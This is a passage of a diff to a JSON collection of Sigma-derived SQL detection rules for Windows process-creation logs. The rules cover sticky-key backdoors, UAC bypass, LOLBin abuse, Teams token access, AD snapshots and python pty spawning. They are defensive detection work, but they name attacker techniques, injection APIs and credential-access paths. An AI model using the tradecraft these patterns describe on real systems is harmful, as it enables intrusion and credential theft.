OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine 
LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" + "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" }, { - "title": "Potential WinAPI Calls Via CommandLine", - "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", + "title": "Service Registry Key Deleted Via Reg.EXE", + "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", "status": "experimental", - "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1106" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' 
ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_inline_win_api_access.yml" + "filename": 
"proc_creation_win_reg_delete_services.yml" }, { - "title": "Lolbin Ssh.exe Use As Proxy", - "id": "7d6d30b8-5b91-4b90-a891-46cccaf29598", + "title": "Use of Wfc.exe", + "id": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", "status": "experimental", - "description": "Detect usage of the \"ssh.exe\" binary as a proxy to launch other programs", - "author": "frack113, Nasreddine Bencherchali", + "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1127" ], "falsepositives": [ - "Legitimate usage for administration purposes" + "Legitimate use by a software developer" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\OpenSSH\\\\sshd.exe' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND (CommandLine LIKE '%ProxyCommand=%' ESCAPE '\\' OR (CommandLine LIKE '%PermitLocalCommand%' ESCAPE '\\' AND CommandLine LIKE '%LocalCommand%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wfc.exe' ESCAPE '\\' OR OriginalFileName = 'wfc.exe'))" ], - "filename": "proc_creation_win_lolbin_ssh.yml" + "filename": "proc_creation_win_lolbin_wfc.yml" }, { - "title": "UAC Bypass Using PkgMgr and DISM", - "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", - "status": "test", - "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Command With Teams Objects Paths", + "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "status": "experimental", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", 
"tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" + "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" }, { - "title": "New Port Forwarding Rule Added Via Netsh.EXX", - "id": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", - "status": "test", - "description": "Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule", - "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", + "title": "Potential Recon Activity Using DriverQuery.EXE", + "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", + "status": "experimental", + "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" + "attack.discovery" ], "falsepositives": [ - "Legitimate administration activity", - "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. 
https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%interface%' ESCAPE '\\' AND CommandLine LIKE '%portproxy%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%v4tov4%' ESCAPE '\\') OR (CommandLine LIKE '%connectp%' ESCAPE '\\' AND CommandLine LIKE '%listena%' ESCAPE '\\' AND CommandLine LIKE '%c=%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_netsh_port_forwarding.yml" + "filename": "proc_creation_win_driverquery_recon.yml" }, { - "title": "Suspicious Control Panel DLL Load", - "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", - "status": "test", - "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Exploitation Attempt From Office Application", + "id": "868955d9-697e-45d4-a3da-360cefd7c216", + "status": "experimental", + "description": "Detects Office applications executing a child process that includes directory traversal patterns. 
This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", + "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" }, { - "title": "PUA - AdFind Suspicious Execution", - "id": "9a132afa-654e-11eb-ae93-0242ac130002", - "status": "test", - "description": "Detects AdFind execution with common flags seen used during attacks", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", + "title": "Powershell ChromeLoader Browser Hijacker", + "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", + "status": "experimental", + "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a 
new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", + "author": "Aedan Russell, frack113 (sigma)", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.persistence", + "attack.t1176" ], "falsepositives": [ - "Legitimate admin activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_adfind_susp_usage.yml" + "filename": "proc_creation_win_browsers_chrome_load_extension.yml" }, { - "title": "Microsoft Workflow Compiler Execution", - "id": "419dbf2b-8a9b-4bea-bf99-7544b050ec8d", - "status": "test", - 
"description": "Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.", - "author": "Nik Seetharaman, frack113", + "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", + "id": "ef61af62-bc74-4f58-b49b-626448227652", + "status": "experimental", + "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1127", - "attack.t1218" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ - "Legitimate MWC use (unlikely in modern enterprise environments)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR OriginalFileName = 'Microsoft.Workflow.Compiler.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_workflow_compiler.yml" + "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" }, { - "title": "Potential System Information Discovery Via Wmic.EXE", - "id": "9d5a1274-922a-49d0-87f3-8c653483b909", + "title": "PUA - Advanced IP Scanner Execution", + "id": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", "status": "experimental", - "description": "Detects the use of the WMI command-line (WMIC) utility to 
identify and display various system information,\nincluding OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,\nand GPU driver products/versions.\nSome of these commands were used by Aurora Stealer in late 2022/early 2023.\n", - "author": "TropChaud", + "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", + "author": "Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy", "tags": [ "attack.discovery", - "attack.t1082" + "attack.t1046", + "attack.t1135" ], "falsepositives": [ - "Unknown" + "Legitimate administrative use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'WMI Commandline Utility' OR OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '%cpu get name%' ESCAPE '\\' OR CommandLine LIKE '%MEMPHYSICAL get MaxCapacity%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get product%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get version%' ESCAPE '\\' OR CommandLine LIKE '%bios get SMBIOSBIOSVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get name%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get DriverVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get VideoModeDescription%' ESCAPE '\\' OR CommandLine LIKE '%OS get Caption,OSArchitecture,Version%' ESCAPE '\\' OR CommandLine LIKE '%DISKDRIVE get Caption%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\advanced\\_ip\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_ip\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced IP Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_system_info_discovery.yml" + "filename": 
"proc_creation_win_pua_advanced_ip_scanner.yml" }, { - "title": "Share And Session Enumeration Using Net.EXE", - "id": "62510e69-616b-4078-b371-847da438cc03", - "status": "stable", - "description": "Detects attempts to enumerate file shares, printer shares and sessions using \"net.exe\" with the \"view\" flag.", - "author": "Endgame, JHasenbusch (ported for oscd.community)", + "title": "SQL Client Tools PowerShell Session Detection", + "id": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", + "status": "test", + "description": "This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", + "author": "Agro (@agro_sev) oscd.communitly", + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1127" + ], + "falsepositives": [ + "Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action." 
+ ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\sqltoolsps.exe' ESCAPE '\\') AND NOT (ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_mssql_sqltoolsps_susp_execution.yml" + }, + { + "title": "Use of VSIISExeLauncher.exe", + "id": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", + "status": "experimental", + "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1018" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Legitimate use of net.exe utility by legitimate user" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '%view%' ESCAPE '\\') AND NOT (CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\VSIISExeLauncher.exe' ESCAPE '\\' OR OriginalFileName = 'VSIISExeLauncher.exe') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_net_share_and_sessions_enum.yml" + "filename": "proc_creation_win_lolbin_vsiisexelauncher.yml" }, { - "title": "Winrar Execution in Non-Standard Folder", - "id": "4ede543c-e098-43d9-a28f-dd784a13132f", - "status": "test", - "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", - "author": "Florian Roth (Nextron Systems), 
Tigzy", - "tags": [ - "attack.collection", - "attack.t1560.001" - ], + "title": "Suspicious Windows Update Agent Empty Cmdline", + "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", + "status": "experimental", + "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((NewProcessName LIKE '%\\\\WinRAR%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrar_execution.yml" + "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" }, { - "title": "Python Spawning Pretty TTY on Windows", - "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", + "title": "Potential Suspicious Mofcomp Execution", + "id": "1dd05363-104e-4b4a-b963-196a534b03a1", "status": "experimental", - "description": "Detects python spawning a pretty tty", - "author": "Nextron Systems", + "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", + "author": 
"Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%python.exe' ESCAPE '\\' OR NewProcessName LIKE '%python3.exe' ESCAPE '\\' OR NewProcessName LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mofcomp.exe' ESCAPE '\\' OR OriginalFileName = 'mofcomp.exe') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\')))" ], - "filename": "proc_creation_win_python_pty_spawn.yml" + "filename": "proc_creation_win_mofcomp_execution.yml" }, { - "title": "Finger.exe Suspicious Invocation", - "id": "af491bca-e752-4b44-9c86-df5680533dbc", - "status": "experimental", - "description": "Detects suspicious aged 
finger.exe tool execution often used in malware attacks nowadays", - "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", + "title": "Malicious PE Execution by Microsoft Visual Studio Debugger", + "id": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", + "status": "test", + "description": "There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.\n", + "author": "Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.t1218", + "attack.defense_evasion" ], "falsepositives": [ - "Admin activity (unclear what they do nowadays with finger.exe)" + "The process spawned by vsjitdebugger.exe is uncommon." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'finger.exe' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\vsjitdebugger.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\vsimmersiveactivatehelper%.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\devenv.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_finger_usage.yml" + "filename": "proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" }, { - "title": "Detected Windows Software Discovery", - "id": "e13f668e-7f95-443d-98d2-1816a7648a7b", + "title": "Audio Capture via SoundRecorder", + "id": "83865853-59aa-449e-9600-74b9d89a6d6e", "status": "test", - "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", - "author": "Nikita 
Nazarov, oscd.community", + "description": "Detect attacker collecting audio via SoundRecorder application.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.discovery", - "attack.t1518" + "attack.collection", + "attack.t1123" ], "falsepositives": [ - "Legitimate administration activities" + "Legitimate audio capture by legitimate user." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%query%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%svcversion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\SoundRecorder.exe' ESCAPE '\\' AND CommandLine LIKE '%/FILE%' ESCAPE 